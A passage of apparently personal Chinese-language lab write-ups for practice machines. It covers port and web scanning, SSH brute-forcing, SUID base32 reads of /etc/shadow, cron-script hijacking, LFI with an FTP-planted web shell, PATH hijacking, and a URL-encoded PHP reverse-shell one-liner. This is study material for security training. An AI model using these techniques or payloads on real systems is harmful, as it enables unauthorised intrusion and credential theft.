WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt 192 | 193 | ----------------- 194 | 195 | GENERATED WORDS: 4612 196 | 197 | ---- Scanning URL: http://192.168.146.66:9198/ ---- 198 | + http://192.168.146.66:9198/index.html (CODE:200|SIZE:176) 199 | + http://192.168.146.66:9198/info.php (CODE:200|SIZE:2) 200 | 201 | ----------------- 202 | END_TIME: Sun Aug 14 15:30:04 2022 203 | DOWNLOADED: 4612 - FOUND: 2 204 | 205 | 206 | └─$ nikto -h "http://192.168.146.66:9198/" 207 | - Nikto v2.1.6 208 | --------------------------------------------------------------------------- 209 | + Target IP: 192.168.146.66 210 | + Target Hostname: 192.168.146.66 211 | + Target Port: 9198 212 | + Start Time: 2022-08-14 15:27:11 (GMT8) 213 | --------------------------------------------------------------------------- 214 | + Server: SimpleHTTP/0.6 Python/2.7.16 215 | + The anti-clickjacking X-Frame-Options header is not present. 216 | + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS 217 | + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type 218 | + No CGI Directories found (use '-C all' to force check all possible dirs) 219 | + SimpleHTTP/0.6 appears to be outdated (current is at least 1.2) 220 | + ERROR: Error limit (20) reached for host, giving up. Last error: 221 | + Scan terminated: 19 error(s) and 4 item(s) reported on remote host 222 | + End Time: 2022-08-14 15:28:51 (GMT8) (100 seconds) 223 | --------------------------------------------------------------------------- 224 | 225 | 226 | Target: http://192.168.146.66:9198/ 227 | 228 | [15:25:22] Starting: 229 | [15:25:43] 200 - 176B - /index.html 230 | [15:25:44] 200 - 2B - /info.php 231 | 232 | ``` 233 | 与前几次的扫描结果基本一致 234 | 235 | 拿到了ssh密码 236 | ## 突破边界 237 | ### SSH密码爆破 238 | 到后面, web页面基本上只给了我们一个passwd的信息, 这样我们只能通过ssh爆破来实现突破边界 239 | ![Img](../FILES/Geisha/img-20220814153904.png) 240 | ### 获取密码后提权 241 | 通过ssh密码我们能够直接登录靶机 242 | ![Img](../FILES/Geisha/img-20220814153958.png) 243 |
244 | 查看一下是否有suid的文件以及是否有sudo权限 245 |
246 | ![Img](../FILES/Geisha/img-20220814154114.png) 247 |
248 | 发现/usr/bin/base32拥有suid权限 249 |
250 | 查看如何利用base32去提权 251 |
252 | ![Img](../FILES/Geisha/img-20220814154256.png) 253 | 那我们就可以通过base32去读取/etc/shadow的的文件了! 254 | ![Img](../FILES/Geisha/img-20220814154315.png) 255 | 获取到root的密码哈希, 尝试能否使用john爆破 256 |
257 | 同样的我们也可以尝试去获取root的sshkey 258 |
259 | ![Img](../FILES/Geisha/img-20220814154442.png) 260 | 拿到root的sshkey, 拿到时我们需要修改sshkey的权限, 否则无法登录 261 |
262 | ![Img](../FILES/Geisha/img-20220814154639.png) 263 | ### 提权成功 264 | 通过修改id_rsa的权限, 成功登录root 265 |
266 | ![Img](../FILES/Geisha/img-20220814154715.png) 267 | ![Img](../FILES/Geisha/img-20220814154741.png) 268 | 269 | ## Note 270 | 在本文当中使用到的查找suid权限的文件的命令为 271 | ``` 272 | find / -perm -u=s -type f 2>/dev/null 273 | ``` 274 | ## 总结 275 | 这次靶机当中我们主要以爆破来突破边界, 通过suid的方式提权, 端口很多导致我们的进度缓慢, 所以要整理思路, 可以在一开始拿到passwd文件的时候就进行爆破, 以减少自己的工作量, 节省时间 276 |
277 | 最后, 祝各位师傅早日拿到自己想要的证书 -------------------------------------------------------------------------------- /Target Notes/Tre.md: -------------------------------------------------------------------------------- 1 | # Tre 2 | 难度: 中等 3 | ## 信息收集 4 | ### 端口枚举 5 | ``` 6 | // 全端口 7 | ┌──(aaron㉿aacai)-[~/Desktop/Tre] 8 | └─$ sudo nmap -p- 192.168.146.77 9 | Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-01 12:58 HKT 10 | Nmap scan report for 192.168.146.77 11 | Host is up (0.00032s latency). 12 | Not shown: 65532 closed tcp ports (reset) 13 | PORT STATE SERVICE 14 | 22/tcp open ssh 15 | 80/tcp open http 16 | 8082/tcp open blackice-alerts 17 | MAC Address: 00:0C:29:91:D4:A8 (VMware) 18 | 19 | Nmap done: 1 IP address (1 host up) scanned in 14.48 seconds 20 | 21 | // 指定端口 22 | ┌──(aaron㉿aacai)-[~/Desktop/Tre] 23 | └─$ sudo nmap -p22,80,8082 -sV -A 192.168.146.77 24 | Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-01 12:58 HKT 25 | Nmap scan report for 192.168.146.77 26 | Host is up (0.00028s latency). 27 | 28 | PORT STATE SERVICE VERSION 29 | 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 30 | | ssh-hostkey: 31 | | 2048 99:1a:ea:d7:d7:b3:48:80:9f:88:82:2a:14:eb:5f:0e (RSA) 32 | | 256 f4:f6:9c:db:cf:d4:df:6a:91:0a:81:05:de:fa:8d:f8 (ECDSA) 33 | |_ 256 ed:b9:a9:d7:2d:00:f8:1b:d3:99:d6:02:e5:ad:17:9f (ED25519) 34 | 80/tcp open http Apache httpd 2.4.38 ((Debian)) 35 | |_http-title: Tre 36 | |_http-server-header: Apache/2.4.38 (Debian) 37 | 8082/tcp open http nginx 1.14.2 38 | |_http-title: Tre 39 | |_http-server-header: nginx/1.14.2 40 | MAC Address: 00:0C:29:91:D4:A8 (VMware) 41 | Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port 42 | Device type: general purpose 43 | Running: Linux 4.X|5.X 44 | OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 45 | OS details: Linux 4.15 - 5.6 46 | Network Distance: 1 hop 47 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 48 | 49 | TRACEROUTE 50 | HOP RTT ADDRESS 51 | 1 0.28 ms 192.168.146.77 52 | 53 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 54 | Nmap done: 1 IP address (1 host up) scanned in 14.72 seconds 55 | 56 | ┌──(aaron㉿aacai)-[~/Desktop/Tre] 57 | └─$ 58 | 59 | ``` 60 | ### Web 目录枚举 61 | - 80端口 62 | 63 | Dirsearch 64 | ``` 65 | Target: http://192.168.146.77/ 66 | [13:04:20] 200 - 5KB - /adminer.php 67 | [13:04:24] 301 - 314B - /cms -> http://192.168.146.77/cms/ 68 | [13:04:24] 302 - 0B - /cms/ -> site/ 69 | [13:04:31] 200 - 164B - /index.html 70 | [13:04:33] 200 - 87KB - /info.php 71 | [13:04:44] 403 - 279B - /server-status/ 72 | [13:04:44] 403 - 279B - /server-status 73 | [13:04:46] 401 - 461B - /system 74 | [13:04:46] 401 - 461B - /system/ 75 | [13:04:46] 401 - 461B - /system/cache/ 76 | [13:04:46] 401 - 461B - /system/cron/cron.txt 77 | [13:04:46] 401 - 461B - /system/expressionengine/config/config.php 78 | [13:04:46] 401 - 461B - /system/log/ 79 | [13:04:46] 401 - 461B - /system/logs/ 80 | [13:04:46] 401 - 461B - /system/storage/ 81 | [13:04:47] 401 - 461B - /system/error.txt 82 | [13:04:47] 401 - 461B - /system/expressionengine/config/database.php 83 | 84 | ``` 85 | nikto 86 | ``` 87 | └─$ nikto -h http://192.168.146.77/ 88 | - Nikto v2.1.6 89 | --------------------------------------------------------------------------- 90 | + Target IP: 192.168.146.77 91 | + Target Hostname: 192.168.146.77 92 | + Target Port: 80 93 | + Start Time: 2022-08-01 13:06:44 (GMT8) 94 | --------------------------------------------------------------------------- 95 | + Server: Apache/2.4.38 (Debian) 96 | + The anti-clickjacking X-Frame-Options header is not present. 97 | + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS 98 | + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type 99 | + No CGI Directories found (use '-C all' to force check all possible dirs) 100 | + Server may leak inodes via ETags, header found with file /, inode: a4, size: 5a56bc0e14dfe, mtime: gzip 101 | + Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 102 | + Default account found for 'Restricted Content' at /system/ (ID 'admin', PW 'admin'). Generic account discovered.. 103 | + /info.php: Output from the phpinfo() function was found. 104 | + OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. 105 | + OSVDB-3233: /icons/README: Apache default file found. 106 | + OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/ 107 | + X-XSS-Protection header has been set to disable XSS Protection. There is unlikely to be a good reason for this. 108 | + 7941 requests: 0 error(s) and 11 item(s) reported on remote host 109 | + End Time: 2022-08-01 13:07:18 (GMT8) (34 seconds) 110 | --------------------------------------------------------------------------- 111 | + 1 host(s) tested 112 | 113 | ``` 114 | #### 在这里发现了/system的密码为admin admin 115 | dirb 116 | ``` 117 | └─$ dirb "http://192.168.146.77/" /usr/share/wordlists/dirb/big.txt 118 | 119 | ----------------- 120 | DIRB v2.22 121 | By The Dark Raver 122 | ----------------- 123 | 124 | START_TIME: Mon Aug 1 14:10:44 2022 125 | URL_BASE: http://192.168.146.77/ 126 | WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt 127 | 128 | ----------------- 129 | 130 | GENERATED WORDS: 20458 131 | 132 | ---- Scanning URL: http://192.168.146.77/ ---- 133 | ==> DIRECTORY: http://192.168.146.77/cms/ 134 | ==> DIRECTORY: http://192.168.146.77/mantisbt/ 135 | + http://192.168.146.77/server-status (CODE:403|SIZE:279) 136 | + http://192.168.146.77/system (CODE:401|SIZE:461) 137 | 138 | ---- Entering directory: http://192.168.146.77/cms/ ---- 139 | ==> DIRECTORY: http://192.168.146.77/cms/cache/ 140 | ==> DIRECTORY: http://192.168.146.77/cms/core/ 141 | ==> DIRECTORY: http://192.168.146.77/cms/custom/ 142 | ==> DIRECTORY: http://192.168.146.77/cms/extensions/ 143 | ==> DIRECTORY: http://192.168.146.77/cms/site/ 144 | ==> DIRECTORY: http://192.168.146.77/cms/templates/ 145 | ==> DIRECTORY: http://192.168.146.77/cms/vendor/ 146 | 147 | ---- Entering directory: http://192.168.146.77/mantisbt/ ---- 148 | ==> DIRECTORY: http://192.168.146.77/mantisbt/admin/ 149 | ==> DIRECTORY: http://192.168.146.77/mantisbt/api/ 150 | ==> DIRECTORY: http://192.168.146.77/mantisbt/config/ 151 | ==> DIRECTORY: http://192.168.146.77/mantisbt/core/ 152 | ==> DIRECTORY: http://192.168.146.77/mantisbt/css/ 153 | ==> DIRECTORY: http://192.168.146.77/mantisbt/doc/ 154 | ==> DIRECTORY: http://192.168.146.77/mantisbt/fonts/ 155 | ==> DIRECTORY: http://192.168.146.77/mantisbt/images/ 156 | ==> DIRECTORY: http://192.168.146.77/mantisbt/js/ 157 | ==> DIRECTORY: http://192.168.146.77/mantisbt/lang/ 158 | ==> DIRECTORY: http://192.168.146.77/mantisbt/library/ 159 | ==> DIRECTORY: http://192.168.146.77/mantisbt/plugins/ 160 | ==> DIRECTORY: http://192.168.146.77/mantisbt/scripts/ 161 | ==> DIRECTORY: http://192.168.146.77/mantisbt/vendor/ 162 | 163 | ---- Entering directory: http://192.168.146.77/cms/core/ ---- 164 | ==> DIRECTORY: http://192.168.146.77/cms/core/admin/ 165 | ==> DIRECTORY: http://192.168.146.77/cms/core/feeds/ 166 | ==> DIRECTORY: http://192.168.146.77/cms/core/inc/ 167 | ---- Entering directory: http://192.168.146.77/cms/core/admin/ ---- 168 | ==> DIRECTORY: http://192.168.146.77/cms/core/admin/ajax/ 169 | ==> DIRECTORY: http://192.168.146.77/cms/core/admin/css/ 170 | ==> DIRECTORY: http://192.168.146.77/cms/core/admin/email/ 171 | ==> DIRECTORY: http://192.168.146.77/cms/core/admin/images/ 172 | ==> DIRECTORY: http://192.168.146.77/cms/core/admin/js/ 173 | ==> DIRECTORY: http://192.168.146.77/cms/core/admin/layouts/ 174 | ==> DIRECTORY: http://192.168.146.77/cms/core/admin/modules/ 175 | ==> DIRECTORY: http://192.168.146.77/cms/core/admin/pages/ 176 | ``` 177 | 178 | nikto 179 | 180 | ``` 181 | 182 | ┌──(aaron㉿aacai)-[~/Desktop/Tre] 183 | └─$ nikto -h http://192.168.146.77:8082 184 | - Nikto v2.1.6 185 | --------------------------------------------------------------------------- 186 | + Target IP: 192.168.146.77 187 | + Target Hostname: 192.168.146.77 188 | + Target Port: 8082 189 | + Start Time: 2022-08-01 13:08:06 (GMT8) 190 | --------------------------------------------------------------------------- 191 | + Server: nginx/1.14.2 192 | + The anti-clickjacking X-Frame-Options header is not present. 193 | + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS 194 | + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type 195 | + No CGI Directories found (use '-C all' to force check all possible dirs) 196 | + 7917 requests: 0 error(s) and 3 item(s) reported on remote host 197 | + End Time: 2022-08-01 13:08:19 (GMT8) (13 seconds) 198 | --------------------------------------------------------------------------- 199 | + 1 host(s) tested 200 | 201 | ``` 202 | ### Web 页面信息收集 203 | 直接访问80端口是一个竹子的图片 204 |
205 | ![Img](../FILES/Tre/img-20220801133805.png) 206 |
207 | 访问/cms是一个blog的主页 208 | ![Img](../FILES/Tre/img-20220801134225.png) 209 | 访问adminer.php是一个数据库登录界面 210 | ![Img](../FILES/Tre/img-20220801135523.png) 211 |
212 | 访问/system页面之后输入密码发现是一个登录界面 213 | ![Img](../FILES/Tre/img-20220801133840.png) 214 | 尝试注册发现这里并没有输入密码的选项, 而是选择发送邮件 215 | ![Img](../FILES/Tre/img-20220801134841.png) 216 | 忘记密码也是需要邮箱地址 217 | ![Img](../FILES/Tre/img-20220801134849.png) 218 | 尝试其他方案 219 |
220 | 使用nikto查看一下目录下的信息 221 | ``` 222 | └─$ nikto -h "http://192.168.146.77/system" 223 | - Nikto v2.1.6 224 | --------------------------------------------------------------------------- 225 | + Target IP: 192.168.146.77 226 | + Target Hostname: 192.168.146.77 227 | + Target Port: 80 228 | + Start Time: 2022-08-01 13:40:20 (GMT8) 229 | --------------------------------------------------------------------------- 230 | + Server: Apache/2.4.38 (Debian) 231 | + The anti-clickjacking X-Frame-Options header is not present. 232 | + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS 233 | + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type 234 | + Default account found for 'Restricted Content' at /system/ (ID 'admin', PW 'admin'). Generic account discovered.. 235 | + Root page / redirects to: http://192.168.146.77/system/login_page.php 236 | + OSVDB-3268: /system/scripts/: Directory indexing found. 237 | + Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 238 | + OSVDB-3268: /system/config/: Directory indexing found. 239 | + /system/config/: Configuration information may be available remotely. 240 | + Cookie MANTIS_STRING_COOKIE created without the httponly flag 241 | + OSVDB-3268: /system/doc/: Directory indexing found. 242 | + OSVDB-48: /system/doc/: The /doc/ directory is browsable. This may be /usr/doc. 243 | + OSVDB-3268: /system/css/: Directory indexing found. 244 | + OSVDB-3092: /system/css/: This might be interesting... 245 | + OSVDB-3268: /system/library/: Directory indexing found. 246 | + OSVDB-3092: /system/library/: This might be interesting... 247 | + OSVDB-3268: /system/images/: Directory indexing found. 248 | + OSVDB-3268: /system/api/soap/: Directory indexing found. 249 | + /system/composer.json: PHP Composer configuration file reveals configuration information - https://getcomposer.org/ 250 | + /system/composer.lock: PHP Composer configuration file reveals configuration information - https://getcomposer.org/ 251 | + 8751 requests: 0 error(s) and 19 item(s) reported on remote host 252 | + End Time: 2022-08-01 13:40:39 (GMT8) (19 seconds) 253 | --------------------------------------------------------------------------- 254 | ``` 255 | 在/doc目录下找到Admin-Guide, 发现版本号为2.0 256 | ![Img](../FILES/Tre/img-20220801135102.png) 257 | 去google搜索是否有漏洞时, 并没有发现有相关版本漏洞 258 |
259 | ![Img](../FILES/Tre/img-20220801135134.png) 260 |
261 | 访问一下/mantisbt/config/ 262 | ![Img](../FILES/Tre/img-20220801144836.png) 263 | 发现了一个.txt文件 264 |
265 | 打开之后发现数据库的密码! 266 | ![Img](../FILES/Tre/img-20220801144900.png) 267 |
268 | 登录成功 269 | ![Img](../FILES/Tre/img-20220801144935.png) 270 | 查看user表 271 | ![Img](../FILES/Tre/img-20220801145052.png) 272 | 得到密码 273 | ## 突破边界 274 | 使用ssh登录 275 | ``` 276 | └─$ ssh tre@192.168.146.77 277 | tre@tre:~$ ls 278 | tre@tre:~$ id 279 | uid=1000(tre) gid=1000(tre) groups=1000(tre),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev) 280 | tre@tre:~$ sudo -l 281 | Matching Defaults entries for tre on tre: 282 | env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin 283 | 284 | User tre may run the following commands on tre: 285 | (ALL) NOPASSWD: /sbin/shutdown 286 | 287 | ``` 288 | 使用sudo -l之后可以看到我们可以不需要密码调用/sbin/shutdown 289 |
290 | 使用pspy查看一下系统进程 291 |
292 | ![Img](../FILES/Tre/img-20220801153305.png) 293 |
294 | 在这里可以看到系统不断在运行check-system, 查看一下这个文件的内容 295 | ``` 296 | tre@tre:/tmp$ ls -al /usr/bin/check-system 297 | -rw----rw- 1 root root 135 May 12 2020 /usr/bin/check-system 298 | tre@tre:/tmp$ cat /usr/bin/check-system 299 | DATE=`date '+%Y-%m-%d %H:%M:%S'` 300 | echo "Service started at ${DATE}" | systemd-cat -p info 301 | 302 | while : 303 | do 304 | echo "Checking..."; 305 | sleep 1; 306 | done 307 | tre@tre:/tmp$ 308 | 309 | ``` 310 | 修改文件内容, 把反弹shell语句插入进去 311 |
312 | ![Img](../FILES/Tre/img-20220801162856.png) 313 |
314 | 然后sudo shutdown -r now重启 315 |
316 | ![Img](../FILES/Tre/img-20220801163035.png) 317 | ``` 318 | root@tre:/# cd ~ 319 | cd ~ 320 | root@tre:/root# ls 321 | ls 322 | root.txt 323 | root@tre:/root# cat root.txt 324 | cat root.txt 325 | {SunCSR_Tr3_Viet_Nam_2020} 326 | root@tre:/root# ip a 327 | ip a 328 | 1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 329 | link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 330 | inet 127.0.0.1/8 scope host lo 331 | valid_lft forever preferred_lft forever 332 | inet6 ::1/128 scope host 333 | valid_lft forever preferred_lft forever 334 | 2: ens33: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 335 | link/ether 00:0c:29:91:d4:a8 brd ff:ff:ff:ff:ff:ff 336 | inet 192.168.146.77/24 brd 192.168.146.255 scope global dynamic ens33 337 | valid_lft 71838sec preferred_lft 71838sec 338 | inet6 fe80::20c:29ff:fe91:d4a8/64 scope link 339 | valid_lft forever preferred_lft forever 340 | root@tre:/root# whoami 341 | whoami 342 | root 343 | root@tre:/root# id 344 | id 345 | uid=0(root) gid=0(root) groups=0(root) 346 | root@tre:/root# 347 | 348 | ``` 349 | 350 | 拿到shell -------------------------------------------------------------------------------- /Target Notes/inclusiveness.md: -------------------------------------------------------------------------------- 1 | # inclusiveness 2 | ## 信息收集 3 | ### 端口枚举 4 | ``` 5 | ┌──(aaron㉿aacai)-[~/Desktop/inclusiveness] 6 | └─$ sudo nmap -p- 192.168.146.57 7 | Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-14 19:29 HKT 8 | Nmap scan report for 192.168.146.57 9 | Host is up (0.00016s latency). 10 | Not shown: 65532 closed tcp ports (reset) 11 | PORT STATE SERVICE 12 | 21/tcp open ftp 13 | 22/tcp open ssh 14 | 80/tcp open http 15 | MAC Address: 00:0C:29:CC:0B:D9 (VMware) 16 | 17 | Nmap done: 1 IP address (1 host up) scanned in 10.67 seconds 18 | 19 | └─$ sudo nmap -p21,22,80 -sV -A 192.168.146.57 20 | Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-14 19:30 HKT 21 | Nmap scan report for 192.168.146.57 22 | Host is up (0.00032s latency). 23 | 24 | PORT STATE SERVICE VERSION 25 | 21/tcp open ftp vsftpd 3.0.3 26 | | ftp-anon: Anonymous FTP login allowed (FTP code 230) 27 | |_drwxrwxrwx 2 0 0 4096 Feb 08 2020 pub [NSE: writeable] 28 | | ftp-syst: 29 | | STAT: 30 | | FTP server status: 31 | | Connected to ::ffff:192.168.146.50 32 | | Logged in as ftp 33 | | TYPE: ASCII 34 | | No session bandwidth limit 35 | | Session timeout in seconds is 300 36 | | Control connection is plain text 37 | | Data connections will be plain text 38 | | At session startup, client count was 2 39 | | vsFTPd 3.0.3 - secure, fast, stable 40 | |_End of status 41 | 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0) 42 | | ssh-hostkey: 43 | | 2048 06:1b:a3:92:83:a5:7a:15:bd:40:6e:0c:8d:98:27:7b (RSA) 44 | | 256 cb:38:83:26:1a:9f:d3:5d:d3:fe:9b:a1:d3:bc:ab:2c (ECDSA) 45 | |_ 256 65:54:fc:2d:12:ac:e1:84:78:3e:00:23:fb:e4:c9:ee (ED25519) 46 | 80/tcp open http Apache httpd 2.4.38 ((Debian)) 47 | |_http-title: Apache2 Debian Default Page: It works 48 | |_http-server-header: Apache/2.4.38 (Debian) 49 | MAC Address: 00:0C:29:CC:0B:D9 (VMware) 50 | Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port 51 | Device type: general purpose 52 | Running: Linux 3.X|4.X 53 | OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 54 | OS details: Linux 3.2 - 4.9 55 | Network Distance: 1 hop 56 | Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel 57 | 58 | TRACEROUTE 59 | HOP RTT ADDRESS 60 | 1 0.32 ms 192.168.146.57 61 | 62 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 63 | Nmap done: 1 IP address (1 host up) scanned in 18.75 seconds 64 | 65 | ``` 66 | ### FTP信息枚举 67 | 在端口枚举的时候看到FTP允许匿名访问, 匿名访问看看有没有什么文件可以下载 68 | ``` 69 | └─$ ftp 192.168.146.57 70 | Connected to 192.168.146.57. 71 | 220 (vsFTPd 3.0.3) 72 | Name (192.168.146.57:aaron): anonymous 73 | 331 Please specify the password. 74 | Password: 75 | 230 Login successful. 76 | Remote system type is UNIX. 77 | Using binary mode to transfer files. 78 | ftp> ls 79 | 229 Entering Extended Passive Mode (|||28415|) 80 | 150 Here comes the directory listing. 81 | drwxrwxrwx 2 0 0 4096 Feb 08 2020 pub 82 | 226 Directory send OK. 83 | ftp> exit 84 | 221 Goodbye. 85 | 86 | ``` 87 | 看来是没有... 88 | ### Web信息枚举 89 | 通过dirsearch我们可以看到有一个.robots.txt 90 | ``` 91 | [19:35:20] 200 - 59B - /.robots.txt 92 | [19:35:37] 200 - 10KB - /index.html 93 | [19:35:40] 200 - 626B - /manual/index.html 94 | [19:35:44] 200 - 59B - /public_html/robots.txt 95 | [19:35:45] 200 - 59B - /robots.txt 96 | [19:35:45] 200 - 59B - /robots.txt.dist 97 | 98 | ``` 99 | 100 | ![Img](../FILES/inclusiveness/img-20220814193612.png) 101 |
102 | 但是返回告诉我们不是搜索引擎, 那我们就构造一个搜索引擎的ua 103 |
104 | 105 | ``` 106 | curl -s --user-agent Googlebot http://192.168.146.57/robots.txt 107 | ``` 108 | ![Img](../FILES/inclusiveness/img-20220814193752.png) 109 |
110 | 这里看到一个Disallow的目录 111 |
112 | ![Img](../FILES/inclusiveness/img-20220814193827.png) 113 | 访问之后当我们切换语言的时候, 会发现后面多了个lang=en.php, 尝试fuzz 114 | ![Img](../FILES/inclusiveness/img-20220814194154.png) 115 |
116 | 发现确实存在LFI, 直接访问/etc/passwd 117 |
118 | ![Img](../FILES/inclusiveness/img-20220814194223.png) 119 | 还记得刚开始的时候ftp是可以写入的, 那我们在就本地写一个能够接受cmd的系统函数给靶机 120 | ![Img](../FILES/inclusiveness/img-20220814194443.png) 121 | ![Img](../FILES/inclusiveness/img-20220814194510.png) 122 | 这样我们的shell.php就上去了 123 |
124 | 尝试查看一下ftp的目录在哪里, 通常在/etc下, 并且通过nmap我们也知道这个服务名为vsftpd 125 | ![Img](../FILES/inclusiveness/img-20220814194711.png) 126 | 看到了目录在/var/ftp, 这样我们就能直接访问了 127 | ![Img](../FILES/inclusiveness/img-20220814194807.png) 128 | ## 突破边界 129 | 发送php的反弹shell到靶机 130 | ``` 131 | php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.146.50%22%2C4444%29%3Bexec%28%22sh%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27 132 | ``` 133 | ![Img](../FILES/inclusiveness/img-20220814194920.png) 134 |
135 | 获取到www-data的权限 136 |
137 | 查看是否有文件具有suid的权限 138 | ![Img](../FILES/inclusiveness/img-20220814195112.png) 139 |
140 | 来到这个目录下, 查看到一个rootshell.c的文件, 通过gcc生成了rootshell 141 |
142 | ![Img](../FILES/inclusiveness/img-20220814195311.png) 143 | ![Img](../FILES/inclusiveness/img-20220814195433.png) 144 |
145 | 解读一下这行代码: 146 |
147 | 如果文件以Tomcat的身份通过调用whoami的函数进行了身份认证之后, 可以直接提升权限, 否则将会直接打印当前的用户 148 |
149 | 那我们就去/tmp目录下新建一个whoami的文件, 然后伪造自己是tom 150 | ``` 151 | www-data@inclusiveness:/tmp$ echo "printf "tom"" > whoami 152 | echo "printf "tom"" > whoami 153 | www-data@inclusiveness:/tmp$ ls 154 | ls 155 | whoami 156 | www-data@inclusiveness:/tmp$ chmod +x whoami 157 | chmod +x whoami 158 | www-data@inclusiveness:/tmp$ 159 | ``` 160 | 然后修改系统的路径到/tmp 161 | ``` 162 | www-data@inclusiveness:/tmp$ export PATH=/tmp:$PATH 163 | export PATH=/tmp:$PATH 164 | www-data@inclusiveness:/tmp$ 165 | ``` 166 | 167 |
168 | 然后去执行/rootshell 169 |
170 | ![Img](../FILES/inclusiveness/img-20220814200330.png) 171 |
172 | 提权成功 173 |
174 | ![Img](../FILES/inclusiveness/img-20220814200354.png) 175 | -------------------------------------------------------------------------------- /Target Notes/photographer.md: -------------------------------------------------------------------------------- 1 | # photographer 2 | ## 信息收集 3 | ### 端口枚举 4 | 老规矩还是用上nmap进行全端口的扫描 5 | ``` 6 | └─$ sudo nmap -p- 192.168.146.54 7 | Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-14 15:59 HKT 8 | Nmap scan report for 192.168.146.54 9 | Host is up (0.00015s latency). 10 | Not shown: 65531 closed tcp ports (reset) 11 | PORT STATE SERVICE 12 | 80/tcp open http 13 | 139/tcp open netbios-ssn 14 | 445/tcp open microsoft-ds 15 | 8000/tcp open http-alt 16 | MAC Address: 00:0C:29:6F:9C:50 (VMware) 17 | ``` 18 | 指定端口枚举 19 | ``` 20 | └─$ sudo nmap -p80,139,445,8000 -sV -A 192.168.146.54 21 | [sudo] password for aaron: 22 | Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-14 16:23 HKT 23 | Nmap scan report for 192.168.146.54 24 | Host is up (0.00030s latency). 25 | 26 | PORT STATE SERVICE VERSION 27 | 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 28 | |_http-server-header: Apache/2.4.18 (Ubuntu) 29 | |_http-title: Photographer by v1n1v131r4 30 | 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 31 | 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 32 | 8000/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 33 | |_http-server-header: Apache/2.4.18 (Ubuntu) 34 | |_http-title: daisa ahomi 35 | |_http-open-proxy: Proxy might be redirecting requests 36 | |_http-generator: Koken 0.22.24 37 | MAC Address: 00:0C:29:6F:9C:50 (VMware) 38 | Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port 39 | Device type: general purpose 40 | Running: Linux 3.X|4.X 41 | OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 42 | OS details: Linux 3.2 - 4.9 43 | Network Distance: 1 hop 44 | Service Info: Host: PHOTOGRAPHER 45 | 46 | Host script results: 47 | |_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: 0s 48 | | smb2-time: 49 | | date: 2022-08-14T08:23:48 50 | |_ start_date: N/A 51 | |_nbstat: NetBIOS name: PHOTOGRAPHER, NetBIOS user: , NetBIOS MAC: (unknown) 52 | | smb2-security-mode: 53 | | 3.1.1: 54 | |_ Message signing enabled but not required 55 | | smb-os-discovery: 56 | | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) 57 | | Computer name: photographer 58 | | NetBIOS computer name: PHOTOGRAPHER\x00 59 | | Domain name: \x00 60 | | FQDN: photographer 61 | |_ System time: 2022-08-14T04:23:48-04:00 62 | | smb-security-mode: 63 | | account_used: guest 64 | | authentication_level: user 65 | | challenge_response: supported 66 | |_ message_signing: disabled (dangerous, but default) 67 | 68 | TRACEROUTE 69 | HOP RTT ADDRESS 70 | 1 0.31 ms 192.168.146.54 71 | 72 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 73 | Nmap done: 1 IP address (1 host up) scanned in 25.90 seconds 74 | 75 | ``` 76 | 总计开放了4个端口, 进行网页信息枚举 77 | ### 网页信息枚举 78 | 直接访问80端口就是一个blog的主页面 79 | ![Img](../FILES/photographer/img-20220814162851.png) 80 | 使用dirsearch枚举一下路径 81 | ``` 82 | └─$ cat dirsearch_res.txt| grep -v "403" 83 | [16:29:57] Starting: 84 | [16:30:08] 200 - 1KB - /assets/ 85 | [16:30:08] 301 - 317B - /assets -> http://192.168.146.54/assets/ 86 | [16:30:15] 301 - 